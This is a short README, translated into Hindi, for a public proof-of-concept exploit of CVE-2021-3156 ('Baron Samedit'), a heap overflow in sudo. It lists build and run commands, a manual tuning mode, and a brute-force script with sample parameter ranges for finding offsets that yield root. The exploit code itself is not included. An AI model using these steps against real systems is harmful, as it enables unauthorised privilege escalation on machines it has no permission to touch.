
CVE-2021-3156 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo में एक हीप-आधारित बफर ओवरफ्लो (बैरन सैमेडिट)। यह लक्ष्य चयन, मैन्युअल पैरामीटर ट्यूनिंग और विशेषाधिकार वृद्धि के लिए प्रयोगात्मक ब्रूट-फोर्स डिटेक्शन प्रदान करता है।
यह CVE-2021-3156 सुडो में कमजोरी (जिसे Qualys द्वारा Baron Samedit नाम दिया गया है) के लिए एक एक्सप्लॉइट है।
बिल्ड:
$ make
लक्ष्य सूची:
$ ./sudo-hax-me-a-sandwich
चलाएँ:
$ ./sudo-hax-me-a-sandwich <target_number>
मैन्युअल मोड:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
सुनिश्चित करें कि GNU parallel स्थापित है।
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
प्रयास करने के लिए कुछ पैटर्न:
$ ./brute.sh 90 120 50 70 150 300
यह सभी उपलब्ध कोर का उपभोग करेगा। netflix & brute करने का प्रयास न करें।
रिपॉजिटरी में योगदान करें PR भेजें (समझदारी से), मैं मर्ज कर सकता हूँ। एक स्टार दें
कुछ विचार: